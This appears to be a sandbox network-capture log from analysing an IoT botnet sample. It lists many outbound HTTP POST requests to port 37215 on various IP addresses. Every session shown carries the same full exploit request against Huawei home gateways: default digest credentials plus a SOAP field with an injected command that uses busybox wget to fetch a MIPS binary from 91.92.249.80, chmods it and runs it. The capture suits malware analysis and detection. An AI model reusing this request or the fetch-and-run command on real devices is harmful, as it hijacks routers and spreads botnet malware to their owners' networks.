                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          730192.168.2.235704441.190.93.14037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.224975109 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          731192.168.2.2337984207.115.162.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225668907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          732192.168.2.234285676.62.140.11137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225764990 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          733192.168.2.234742441.242.4.17437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225771904 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          734192.168.2.233919241.237.109.17137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225799084 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          735192.168.2.2350332157.84.174.19837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225801945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          736192.168.2.2357146205.28.226.18637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225860119 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          737192.168.2.2340282197.21.25.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225874901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          738192.168.2.2339512157.120.239.16837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225914955 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          739192.168.2.2335276197.196.168.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225915909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          740192.168.2.2343080157.220.113.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.225938082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
